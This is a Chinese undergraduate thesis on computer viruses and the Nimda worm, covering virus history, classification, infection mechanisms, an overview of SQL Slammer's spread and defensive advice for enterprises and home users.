尼姆达（Nimda）蠕虫病毒的查杀
The Identification And Deletion For Nimda
摘要
 本文首先介绍了计算机病毒，重点介绍蠕虫病毒，接着介绍了各种反病毒技术，重点论述了尼姆达（Nimda）蠕虫病毒传染机理，病毒特征以及尼姆达（Nimda）蠕虫病毒的清除。尼姆达（Nimda）蠕虫病毒嗅探器的设计是根据许多杀毒软件杀毒原理而想到的。设计思路是遍例所有运行的进程，查找与尼姆达（Nimda）蠕虫病毒程序Load.exe是否一致，一致则结束该进程并删除病毒源文件。它是一个利用VB 6.0的开发环境进行编程，专门用来针对尼姆达（Nimda）蠕虫病毒的查杀的工具。
关键字: 病毒；蠕虫；尼姆达

Abstract
 This paper introduces a computer virus, the worm virus highlights, and then introduced a variety of anti-virus technology focuses on the Nimda worm virus transmission mechanism, Features and Nimda virus worm virus removal. The sniffer for Nimda worm virus based on the principle of anti-virus which determined many types of anti-virus software.The designing principle relied on widespreading all cases of running processes for the purpose of identifying the consistence of the Nimda Mmc.exe worm virus procedures. If there exists the Nimda Load.exe, the process will be ended and the virus source wil be removed. It is a VB 6.0 development environment for programming, specifically used against Nimda (Nimda) worm virus killing tool.
Key words：Virus；Worm；Nimda

目录
中英文摘要 (I)
1.前言 (1)
1.1起源 (1)
1.2计算机病毒的定义 (1)
1.3计算机病毒的特征 (2)
1.4病毒的分类 (3)
1.5计算机病毒的命名 (4)
1.6计算机病毒的工作过程 (4)
1.7计算机病毒的传染 (4)
2.蠕虫病毒 (7)
2.1蠕虫病毒的定义 (7)
2.2网络蠕虫病毒分析和防范 (9)
2.3经典蠕虫病毒尼姆达（Nimda）解析 (12)
3.尼姆达（Nimda）蠕虫病毒的查杀 (18)
3.1前言 (18)
3.2杀毒软件的扫描方法 (18)
3.3反病毒技术 (21)
3.4尼姆达（Nimda）蠕虫病毒嗅探器的设计 (25)
3.5 结果 (31)
3.6尼姆达（Nimda）蠕虫病毒解决方法 (33)
3.7防范措施 (33)
4.总结 (35)

致  谢 (36)
参考文献 (37)
附录 (38)1.前言
1.1起源
1.1.1病毒的历史
 自从1946年第一台冯-诺依曼型计算机ENIAC出世以来，计算机已被应用到人类社会的各个领域。然而，1988年发生在美国的“蠕虫病毒”事件，给计算机技术的发展罩上了一层阴影。蠕虫病毒是由美国CORNELL大学研究生莫里斯编写。虽然并无恶意，但在当时，“蠕虫”在INTERNET上大肆传染，使得数千台连网的计算机停止运行，并造成巨额损失，成为一时的舆论焦点。在国内，最初引起人们注意的病毒是80年代末出现的“黑色星期五”，“米氏病毒”，“小球病毒”等。因当时软件种类不多，用户之间的软件交流较为频繁且反病毒软件并不普及，造成病毒的广泛流行。后来出现的word宏病毒及win95下的CIH病毒，使人们对病毒的认识更加深了一步。 最初对病毒理论的构思可追溯到科幻小说。在70年代美国作家雷恩出版的《P1的青春》一书中构思了一种能够自我复制，利用通信进行传播的计算机程序，并称之为计算机病毒。[1]
1.1.2病毒的产生 　
 那么究竟它是如何产生的呢？
1、开个玩笑，一个恶作剧。某些爱好计算机并对计算机技术精通的人士为了炫耀自己的高超技术和智慧，凭借对软硬件的深入了解，编制这些特殊的程序。这些程序通过载体传播出去后，在一定条件下被触发。如显示一些动画，播放一段音乐，或提一些智力问答题目等，其目的无非是自我表现一下。这类病毒一般都是良性的，不会有破坏操作。
2、产生于个别人的报复心理。每个人都处于社会环境中，但总有人对社会不满或受到不公正的待遇。如果这种情况发生在一个编程高手身上，那么他有可能会编制一些危险的程序。 在国外有这样的事例：某公司职员在职期间编制了一段代码隐藏在其公司的系统中，一旦检测到他的名字在工资报表中删除，该程序立即发作，破坏整个系统。类似案例在国内亦出现过。
3、用于版权保护。计算机发展初期，由于在法律上对于软件版权保护还没有像今天这样完善。很多商业软件被非法复制，有些开发商为了保护自己的利益制作了一些特殊程序，附在产品中。如：巴基斯坦病毒，其制作者是为了追踪那些非法拷贝他们产品的用户。用于这种目的的病毒目前已不多见。
1.2计算机病毒的定义
 计算机病毒是一个程序，一段可执行码 ,对计算机的正常使用进行破坏，使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传
 送到另一个用户时，它们就随同文件一起蔓延开来。这种程序不是独立存在的，它隐蔽在其他可执行的程序之中，既有破坏性，又有传染性和潜伏性。轻则影响机器运行速度，使机器不能正常运行，重则使机器处于瘫痪，会给用户带来不可估量的损失。通常就把这种具有破坏作用的程序称为计算机病毒。
 除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。
从广义上定义，凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。依据做过不尽相同的定义，但一直没有公认的明确定义。直至1994年2月18日，我国正式颁布实施了《中华人民共和国计算机信息系统安全保护条例》，在《条例》第二十八条中明确指出：”计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。”此定义具有法律性、权威性。[1]
1.3计算机病毒的特征
 计算机病毒的特征：未经授权而执行。一般正常的程序是由用户调用，再由系统分配资源，完成用户交给的任务。其目的对用户是可见的、透明的。而病毒具有正常程序的一切特性，它隐藏在正常程序中，当用户调用正常程序时窃取到系统的控制权，先于正常程序执行，病毒的动作、目的对用户时未知的，是未经用户允许的。
1.传染性。正常的计算机程序一般是不会将自身的代码强行连接到其它程序之上的。而病毒却能使自身的代码强行传染到一切符合其传染条件的未受到传染的程序之上。计算机病毒可通过各种可能的渠道，如软盘、计算机网络去传染其它的计算机。当你在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网的其它计算机也许也被该病毒浸染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。
2.隐蔽性。病毒一般是具有很高编程技巧、短小精悍的程序。通常附在正常程序中或磁盘代码分析，病毒程序与正常程序是不容易区别开来的。一般在没有防护措施的情况下，计算机病毒程序取得系统控制权后，可以在很短的时间里传染大量程序。而且受到传染后，计算机系统通常仍能正常运行，使用户不会感到任何异常。试想，如果病毒在传染到计算机上之后，机器马上无法正常运行，那么它本身便无法继续进行传染了。正是由于隐蔽性，计算机病毒得以在用户没有察觉的情况下扩散到上百万台计算机中。大部分的病毒的代码之所以设计得非常短小，也是为了隐藏。病毒一般只有几百或1k字节，而PC机对DOS文件的存取速度可达每秒几百KB以上，所以病毒转瞬之间便可将这短短的几百字节附着到正常程序之中，使人非常不易被察觉。
3.潜伏性。大部分的病毒感染系统之后一般不会马上发作，它可长期隐藏在系统中，只有在满足其特定条件时才启动其表现（破坏）模块。只有这样它才可进行广泛地传播。如“PETER-2”在每年2月27日会提三个问题，答错后会将硬盘加密。著名的“黑色星期五”，每逢13号的星期五发作。国内的“上海一号”会在每年三、六、九月的13日发作。当然，最令人难忘的便是26日发作的CIH。这些病毒在平时会隐藏得很好，只有在发作日才会露出本来面目。
4.破坏性。任何病毒只要侵入系统，都会对系统及应用程序产生程度不同的影响。良性病毒与恶性病毒。良性病毒可能只显示些画面或出点音乐、无聊的语句，或者根本没有任何破坏动作，但会占用系统资源。这类病毒较多，如：GENP、小球、W-BOOT等。恶性病毒则有明确的目的，或破坏数据、删除文件或加密磁盘、格式化磁盘，有的对数据造成不可挽回的破坏。这也反映出病毒编制者的险恶用心。
5. 不可预见性。从对病毒的检测方面来看，病毒还有不可预见性。不同种类的病毒，它们的代码千差万别，但有些操作是共有的（如驻内存，改中断）。有些人利用病毒的这种共性，制作了声称可查所有病毒的程序。这种程序的确可查出一些新病毒，但由于目前的软件种类极其丰富，且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。使用这种方法对病毒进行检测势必会造成较多的误报情况。而且病毒的制作技术也在不断的提高，病毒对反病毒软件永远是超前的。
1.4病毒的分类
 从第一个病毒出世以来，究竟世界上有多少种病毒，说法不一。无论多少种，病毒的数量仍在不断增加。据国外统计，计算机病毒以10种/周的速度递增，另据我国公安部统计，国内以4种/月的速度递增。如此多的种类，做一下分类可更好地了解它们。
1、按破坏性可分为：良性病毒，恶性病毒。前面已介绍过。
（1）良性病毒：仅仅显示信息、奏乐、发出声响，自我复制的。
（2）恶性病毒：封锁、干扰、中断输入输出、使用户无法打印等正常工作，甚至电脑中止运行。
（3）极恶性病毒：死机、系统崩溃、删除普通程序或系统文件，破坏系统配置导致系统死机、崩溃、无法重启。
（4）灾难性病毒：破坏分区表信息、主引导信息、FAT，删除数据文件，甚至格式化硬盘等。
2、按传染方式分为：引导型病毒、文件型病毒和混合型病毒。
（1）文件型病毒：一般只传染磁盘上的可执行文件（COM，EXE）。在用户调用染毒的可执行文件时，病毒首先被运行，然后病毒驻留内存伺机传染其他文件或直接传染其他文件。其特点是附着于正常程序文件，成为程序文件的一个外壳或部件。这是较为常见的传染方式。
（2）混合型病毒：兼有以上两种病毒的特点，既感染引导区又感染文件，因此扩大了这种病毒的传染途径（如97年国内流行较广的“TPVO-3783（SPY）”）。
3、按连接方式分为：源码型病毒、入侵型病毒、操作系统型病毒、外壳型病毒。
（1）源码型病毒：较为少见，亦难以编写。因为它要攻击高级语言编写的源程序，在源程序编译之前插入其中，并随源程序一起编译、连接成可执行文件。此时刚刚生成的可执行文件便已经带毒了。 　　
（2）入侵型病毒：可用自身代替正常程序种的部分模块或堆栈区。因此这类病毒只攻击某些特定程序，针对性强。一般情况下也难以被发现，清除起来也较困难。
（3）操作系统型病毒：可用其自身部分加入或替代操作系统的部分功能。因其直接感染操作系统，这类病毒的危害性也较大。
（4）外壳型病毒：将自身附在正常程序的开头或结尾，相当于给正常程序加了个外壳。大部份的文件型病毒都属于这一类。
1.5计算机病毒的命名
 为了方便的表示病毒的类型、名称和重要特征，一般而言，病毒的名称可以分成三个部分：前缀+病毒名+后缀。
 病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的前缀是 Worm 等等还有其他的。
 病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“ CIH ”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。
 病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如 Worm.Sasser.b 就是指振荡波蠕虫病毒的变种B，因此一般称为“振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多（这也表明该病毒生命力顽强），可以采用数字与字母混合表示变种标识。
 综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。[2]
1.6计算机病毒的工作过程
计算机病毒的完整工作过程应包括以下几个环节：
（1）传染源：病毒总是依附于某些存储价质, 例如软盘、 硬盘等构成传染源。
（2）传染媒介：病毒传染的媒介由工作的环境来定, 可能是计算机网, 也可能是可移动的存储介质, 例如软磁盘等。
（3）病毒激活：是指将病毒装入内存, 并设置触发条件, 一旦触发条件成熟, 病毒就开始作用——自我复制到传染对象中, 进行各种破坏活动等。
（4）病毒触发：计算机病毒一旦被激活, 立刻就发生作用, 触发的条件是多样化的, 可以是内部时钟, 系统的日期, 用户标识符，也可能是系统一次通信等等。
(5）病毒表现：表现是病毒的主要目的之一, 有时在屏幕显示出来, 有时则表现为破坏系统数据。可以这样说, 凡是软件技术能够触发到的地方, 都在其表现范围内。
（6）传染：病毒的传染是病毒性能的一个重要标志。在传染环节中, 病毒复制一个自身副本到传染对象中去。
1.7计算机病毒的传染
1.7.1计算机病毒传染的一般过程
 在系统运行时, 病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时, 便从内存中将自身存入被攻击的目标, 从而将病毒进行传播。而病毒利用系统INT 13H读写磁盘的中断又将其写入系统的外存储器软盘或硬盘中, 再感染其他系统。
1.7.2不同种类的计算机病毒的传染方法
 从病毒的传染方式上来讲, 所有病毒到目前为止可以归结于三类：感染用户程序的计算机病毒；感染操作系统文件的计算机病毒；感染磁盘引导扇区的计算机病毒。这三类病毒的传染方式均不相同。
 感染用户应用程序的计算机病毒的传染方式是病毒以链接的方式对应用程序进行传染。这种病毒在一个受传染的应用程序执行时获得控制权, 同时扫描计算机系统在硬盘或软盘上的另外的应用程序, 若发现这些程序时, 就链接在应用程序中, 完成传染, 返回正常的应用程序并继续执行。
 感染操作系统文件的计算机病毒的传染方式是通过与操作系统中所有的模块或程序链接来进行传染。由于操作系统的某些程序是在系统启动过程中调入内存的, 所以传染操作系统的病毒是通过链接某个操作系统中的程序或模块并随着它们的运行进入内存的。病毒进入内存后就判断是否满足条件时则进行传染。
 感染磁盘引导扇区型病毒的传染方式, 从实质上讲Boot区传染的病毒是将其自身附加到软盘或硬盘的Boot扇区的引导程序中, 并将病毒的全部或部分存入引导扇区512B之中。这种病毒是在系统启动的时候进入内存中, 并取得控制权, 在系统运行的任何时刻都会保持对系统的控制, 时刻监视着系统中使用的新软盘。当一片新的软盘插入系统进行第一次读写时, 病毒就将其传输出该软盘的0扇区中, 而后将传染下一个使用该软盘的系统。通过感染病毒的软盘对系统进行引导是这种病毒传染的主要途径。
1.7.3计算机病毒传染的先决条件
 计算机病毒的传染是以计算机系统的运行及读写磁盘为基础的。没有这样的条件计算机病毒是不会传染的, 因为计算机不启动不运行时就谈不上对磁盘的读写操作或数据共享, 没有磁盘的读写, 病毒就传播不到磁盘上或网络里。所以只要计算机运行就会有磁盘读写动作, 病毒传染的两个先决条件就很容易得到满足。系统运行为病毒驻留内存创造了条件, 病毒传染的第一步是驻留内存；一旦进入内存之后, 寻找传染机会, 寻找可攻击的对象, 判断条件是否满足, 决定是否可传染；当条件满足时进行传染, 将病毒写入磁盘系统。
1.7.4计算机病毒的传染途径
 计算机病毒之所以称之为病毒是因为其具有传染性的本质。传统渠道通常有以下几种：
（1）通过软盘：通过使用外界被感染的软盘, 例如, 不同渠道来的系统盘、来历不明的软件、游戏盘等是最普遍的传染途径。由于使用带有病毒的软盘, 使机器感染病毒发病, 并传染给未被感染的“干净”的软盘。大量的软盘交换, 合法或非法的程序拷贝, 不加控制地随便在机器上使用各种软件造成了病毒感染、泛滥蔓延的温床。
（2）通过硬盘：通过硬盘传染也是重要的渠道, 由于带有病毒机器移到其它地方使用、维修等, 将干净的软盘传染并再扩散。
（3）通过网络：这种传染扩散极快, 能在很短时间内传遍网络上的机器。
 目前在我国现阶段计算机普及程度低, 还没有形成大的网络, 基本上是单机运行, 所以网络传染还没构成大的危害, 因此主要传播途径是通过软盘。
1.7.5计算机病毒的传染条件
 计算机病毒的传染分两种。一种是在一定条件下方可进行传染, 即条件传染。另一种是对一种传染对象的反复传染即无条件传染。
 从目前蔓延传播病毒来看所谓条件传染, 是指一些病毒在传染过程中, 在被传染的系统中的特定位置上打上自己特有的标志。这一病毒在再次攻击这一系统时, 发现有自己的标志则不再进行传染, 如果是一个新的系统或软件, 首先读特定位置的值, 并进行判断, 如果发现读出的值与自己标识不一致, 则对这一系统或应用程序, 或数据盘进行传染, 这是一种情况；另一种情况, 有的病毒通过对文件的类型来判断是否进行传染, 如黑色星期五病毒只感染.COM或.EXE文件等等；还有一种情况有的病毒是以计算机系统的某些设备为判断条件来决定是否感染。例如大麻病毒可以感染硬盘, 又可以感染软盘, 但对B驱动器的软盘进行读写操作时不传染。但我们也发现有的病毒对传染对象反复传染。[3]

2.蠕虫病毒
 凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说，蠕虫也是一种病毒！网络蠕虫病毒，作为对互联网危害严重的一种计算机程序，其破坏力和传染性不容忽视。与传统的病毒不同，蠕虫病毒以计算机为载体，以网络为攻击对象！本章节根据蠕虫病毒的发作机制，将其分为利用系统级别漏洞（主动传播）和利用社会工程学(欺骗传播)两种，并详细解析了经典蠕虫病毒尼姆达(Nimda)，说明传染机理、病毒特征以及用户对病毒的防范。
2.1蠕虫病毒的定义
2.1.1蠕虫病毒的定义
 计算机病毒自出现之日起，就成为计算机的一个巨大威胁，而当网络迅速发展的时候，蠕虫病毒引起的危害开始显现！从广义上定义，凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说，蠕虫也是一种病毒！但是蠕虫病毒和一般的病毒有着很大的区别。对于蠕虫，现在还没有一个成套的理论体系，一般认为，蠕虫是一种通过网络传播的恶性病毒，它具有病毒的一些共性，如传播性，隐蔽性，破坏性等等，同时具有自己的一些特征，如不利用文件寄生（有的只存在于内存中），对网络造成拒绝服务，以及和黑客技术相结合等等。在产生的破坏性上，蠕虫病毒也不是普通病毒所能比拟的，网络的发展使得蠕虫可以在短短的时间内蔓延整个网络，造成网络瘫痪！
 根据使用者情况可将蠕虫病毒分为2类，一种是面向企业用户和局域网而言，这种病毒利用系统漏洞，主动进行攻击，可以对整个互联网可造成瘫痪性的后果!以“红色代码”，“尼姆达”，以及最新的“sql蠕虫王”为代表。另外一种是针对个人用户的，通过网络(主要是电子邮件，恶意网页形式)迅速传播的蠕虫病毒，以爱虫病毒，求职信病毒为例.在这两类中，第一类具有很大的主动攻击性，而且爆发也有一定的突然性，但相对来说，查杀这种病毒并不是很难。第二种病毒的传播方式比较复杂和多样，少数利用了微软的应用程序的漏洞，更多的是利用社会工程学对用户进行欺骗和诱使，这样的病毒造成的损失是非常大的，同时也是很难根除的，比如求职信病毒，在2001年就已经被各大杀毒厂商发现，但直到2002年底依然排在病毒危害排行榜的首位就是证明！在接下来的内容中，将分别分析这两种病毒的一些特征及防范措施。
2.1.2蠕虫病毒与一般病毒的异同
　　 蠕虫也是一种病毒，因此具有病毒的共同特征。一般的病毒是需要的寄生的，它可以通过自己指令的执行，将自己的指令代码写到其他程序的体内，而被感染的文件就被称为"宿主”，例如，windows下可执行文件的格式为PE格式(Portable Executable)，当需要感染PE文件时，在宿主程序中，建立一个新节，将病毒代码写到新节中，修改的程序入口点等，这样，宿主程序执行的时候，就可以先执行病毒程序，病毒程序运行完之后，就把控制权交给宿主原来的程序指令。可见，病毒主要是感染文件，当然也还有像DIRII这种链接型病毒，还有引导区病毒。引导区病毒他是感染磁盘的引导区，如果是软盘被感染，这张软盘用在其他机器上后，同样也会感染其他机器，所以传播方式也是用软盘等方式。
蠕虫一般不采取利用PE格式插入文件的方法，而是复制自身在互联网环境下进行传播，病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!
 普通病毒 蠕虫病毒
存在形式 寄存文件 独立程序
传染机制 宿主程序运行 主动攻击
传染目标 本地文件 网络计算机

表2-1  普通病毒与蠕虫病毒对照表
可以预见，未来能够给网络带来重大灾难的主要必定是网络蠕虫!
2.1.3蠕虫的破坏和发展趋势
1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造成了数千台计算机停机，蠕虫病毒开始现身网络。而后来的红色代码，尼姆达病毒疯狂的时候，造成几十亿美元的损失；北京时间2003年1月26日，一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球，致使互联网网路严重堵塞，作为互联网主要基础的域名服务器（DNS）的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅减缓，同时银行自动提款机的运作中断，机票等网络预订系统的运作中断，信用卡等收付款系统出现故障!专家估计，此病毒造成的直接经济损失至少在12亿美元以上!

病毒名称 持续时间 造成损失
莫里斯蠕虫 1988年 6000多台计算机停机，直接经济损失达9600万美元!
美丽杀手 1999年 政府部门和一些大公司紧急关闭了网络服务器，经济损失超过12亿美元!
爱虫病毒 2000年5月至今 众多用户电脑被感染，损失超过100亿美元以上
红色代码 2001年7月 网络瘫痪，直接经济损失超过26亿美元
求职信 2001年12月至今 大量病毒邮件堵塞服务器，损失达数百亿美元
Sql蠕虫王 2003年1月 网络大面积瘫痪，银行自动提款机运做中断，直接经济损失超过26亿美元

表2-2 各种病毒造成的损失[4]
 由上表可以知道，蠕虫病毒对网络产生堵塞作用，并造成了巨大的经济损失!
　　通过对以上蠕虫病毒的分析，可以知道，蠕虫发作的一些特点和发展趋势：
　　1.利用操作系统和应用程序的漏洞主动进行攻击。此类病毒主要是“红色代码”和“尼姆达”，以及至今依然肆虐的"求职信”等。由于IE浏览器的漏洞(Iframe Execcomand)，使得感染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激活，而此前即便是很多防病毒专家也一直认为，带有病毒附件的邮件，只要不去打开附件，病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!
　　2.传播方式多样。如“尼姆达”病毒和"求职信”病毒，可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。
　　3.病毒制作技术与传统的病毒不同的是，许多新病毒是利用当前最新的编程语言与编程技术实现的，易于修改以产生新的变种，从而逃避反病毒软件的搜索。另外，新病毒利用Java、ActiveX、VB Script等技术，可以潜伏在HTML页面里，在上网浏览时触发。
　　4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例，感染后的机器的web目录的\scripts下将生成一个root.exe，可以远程执行任何命令，从而使黑客能够再次进入!
2.2网络蠕虫病毒分析和防范
 蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞，这里的漏洞也可以说是缺陷，我们分为2种，软件上的缺陷和人为上的缺陷。软件上的缺陷，如远程溢出，微软ie和outlook的自动执行漏洞等等，需要软件厂商和用户共同配合，不断的升级软件。而人为的缺陷，主要是指的是计算机用户的疏忽。这就是所谓的社会工程学(social engineering)，当收到一封邮件带着病毒的求职信邮件时候，大多数人都会抱着好奇心去点击。对于企业用户来说，威胁主要集中在服务器和大型应用软件的安全上，而个人用户而言，主要是防范第二种缺陷。
2.2.1利用系统漏洞的恶性蠕虫病毒分析
 在这种病毒中，以红色代码，尼姆达和sql蠕虫为代表!他们共同的特征是利用微软服务器和应用程序组件的某个漏洞进行攻击，由于网上存在这样的漏洞比较普遍，使得病毒很容易的传播!而且攻击的对象大都为服务器，所以造成的网络堵塞现象严重!
 以2003年1月26号爆发的sql蠕虫为例，爆发数小时内席卷了全球网络，造成网络大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影响较为严重。韩国两大网络业KFT及南韩电讯公司，系统都陷入了瘫痪，其它的网络用户也被迫断线，更为严重的是许多银行的自动取款机都无法正常工作，根据美国银行统计，该行的13000台自动柜员机已经无法提供正常提款。网络蠕虫病毒开始对人们的生活产生了巨大的影响!
 这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的，利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞， Microsoft SQL Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统。SQL Server监听UDP的1434端口，客户端可以通过发送消息到这个端口来查询目前可用的连接方式（连接方式可以是命名管道也可以是TCP），但是此程序存在严重漏洞，当客户端发送超长数据包时，将导致缓冲区溢出，黑客可以利用该漏洞在远程机器上执行自己的恶意代码。
 微软在2003年7月份的时候就为这个漏洞发布了一个安全公告，但当sql蠕虫爆发的时候，依然有大量的装有ms sqlserver 2000的服务器没有安装最新的补丁，从而被蠕虫病毒所利用，蠕虫病毒通过一段376个字节的恶意代码，远程获得对方主机的系统控制权限， 取得三个Win32 API地址，GetTickCount、socket、sendto，接着病毒使用GetTickCount获得一个随机数，进入一个死循环继续传播。在该循环中蠕虫使用获得的随机数生成一个随机的ip地址，然后将自身代码发送至1434端口(Microsoft SQL Server开放端口)，该蠕虫传播速度极快，其使用广播数据包方式发送自身代码，每次均攻击子网中所有255台可能存在机器。由于这是一个死循环的过程，发包密度仅和机器性能和网络带宽有关，所以发送的数据量非常大。该蠕虫对被感染机器本身并没有进行任何恶意破坏行为，也没有向硬盘上写文件，仅仅存在与内存中。对于感染的系统，重新启动后就可以清除蠕虫，但是仍然会重复感染。由于发送数据包占用了大量系统资源和网络带宽，形成Udp Flood，感染了该蠕虫的网络性能会极度下降。一个百兆网络内只要有一两台机器感染该蠕虫就会导致整个网络访问阻塞。[5]
 通过以上分析可以知道，此蠕虫病毒本身除了对网络产生拒绝服务攻击外，并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入破坏代码，后果将不堪设想!
2.2.2企业防范蠕虫病毒措施
 此次sql蠕虫病毒，利用的漏洞在2002年7月份微软的一份安全公告中就有详细说明！而且微软也提供了安全补丁提供下载，然而在时隔半年之后互联网上还有相当大的一部分服务器没有安装最新的补丁，其网络管理员的安全防范意识可见一斑！
 当前，企业网络主要应用于文件和打印服务共享、办公自动化系统、企业业务（MIS）系统、Internet应用等领域。网络具有便利信息交换特性，蠕虫病毒也可以充分利用网络快速传播达到其阻塞网络目的。企业在充分地利用网络进行业务处理时，就不得不考虑企业的病毒防范问题，以保证关系企业命运的业务数据完整不被破坏。
 企业防治蠕虫病毒的时候需要考虑几个问题：病毒的查杀能力，病毒的监控能力，新病毒的反应能力。而企业防毒的一个重要方面是是管理和策略。推荐的企业防范蠕虫病毒的策略如下：
(1)加强网络管理员安全管理水平，提高安全意识。由于蠕虫病毒利用的是系统漏洞进行攻击，所以需要在第一时间内保持系统和应用软件的安全性，保持各种操作系统和应用软件的更新！由于各种漏洞的出现，使得安全不在是一种一劳永逸的事，而作为企业用户而言，所经受攻击的危险也是越来越大，要求企业的管理水平和安全意识也越来越高！
(2)建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻击。
(3)建立应急响应系统，将风险减少到最小！由于蠕虫病毒爆发的突然性，可能在病毒发现的时候已经蔓延到了整个网络，所以在突发情况下，建立一个紧急响应系统是很有必要的，在病毒爆发的第一时间即能提供解决方案。
(4)建立灾难备份系统。对于数据库和数据系统，必须采用定期备份，多机备份措施，防止意外灾难下的数据丢失！
 (5)对于局域网而言，可以采用以下一些主要手段：A.在因特网接入口处安装防火墙式防杀计算机病毒产品，将病毒隔离在局域网之外。B.对邮件服务器进行监控，防止带毒邮件进行传播！C.对局域网用户进行安全培训。D.建立局域网内部的升级系统，包括各种操作系统的补丁升级，各种常用的应用软件升级，各种杀毒软件病毒库的升级等等！
2.2.3对个人用户产生直接威胁的蠕虫病毒
 在以上分析的蠕虫病毒中，只对安装了特定的微软组件的系统进行攻击，而对广大个人用户而言，是不会安装iis(微软的因特网服务器程序，可以允许在网上提供web服务)或者是庞大的数据库系统的！因此一般病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过网络产生影响)，但接下来分析的蠕虫病毒，则是对个人用户威胁最大，同时也是最难以根除，造成的损失也更大的一类蠕虫病毒！
 对于个人用户而言，威胁大的蠕虫病毒采取的传播方式一般为电子邮件(Email)以及恶意网页等等！
 对于利用email传播的蠕虫病毒来说，通常利用的是社会工程学(Social Engineering)，即以各种各样的欺骗手段那诱惑用户点击的方式进行传播！
 恶意网页确切的讲是一段黑客破坏代码程序，它内嵌在网页中，当用户在不知情的情况下打开含有病毒的网页时，病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂，所以会被很多怀不良企图者利用，在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛，并提供破坏程序代码下载，从而造成了恶意网页的大面积泛滥，也使越来越多的用户遭受损失。
2.2.4个人用户对蠕虫病毒的防范措施
 通过上述的分析，我们可以知道，病毒并不是非常可怕的，网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学，而不是利用系统漏洞！所以防范此类病毒需要注意以下几点：
 (1)购合适的杀毒软件！网络蠕虫病毒的发展已经使传统的杀毒软件的“文件级实时监控系统”落伍，杀毒软件必须向内存实时监控和邮件实时监控发展！另外面对防不胜防的网页病毒，也使得用户对杀毒软件的要求越来越高！在杀毒软件市场上，赛门铁克公司的norton系列杀毒软件在全球具有很大的比例！经过多项测试，norton杀毒系列软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒，而且对网页病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的水平。像瑞星，kv系列等杀毒软件，在杀毒软件的同时整合了防火强功能，从而对蠕虫兼木马程序有很大克制作用。
 (2)经常升级病毒库，杀毒软件对病毒的查杀是以病毒的特征码为依据的，而病毒每天都层出不穷，尤其是在网络时代，蠕虫病毒的传播速度快，变种多，所以必须随时更新病毒库，以便能够查杀最新的病毒!
 (3)提高防杀毒意识.不要轻易去点击陌生的站点，有可能里面就含有恶意代码！
 当运行IE时，点击“工具→Internet选项→安全→ Internet区域的安全级别”，把安全级别由“中”改为“高” 。因为这一类网页主要是含有恶意代码的ActiveX或Applet、 java script的网页文件 ，所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以大大减少被网页恶意代码感染的几率。具体方案是：在IE窗口中点击“工具”→“Internet选项”，在弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。但是，这样做在以后的网页浏览过程中有可能会使一些正常应用ActiveX的网站无法浏览。
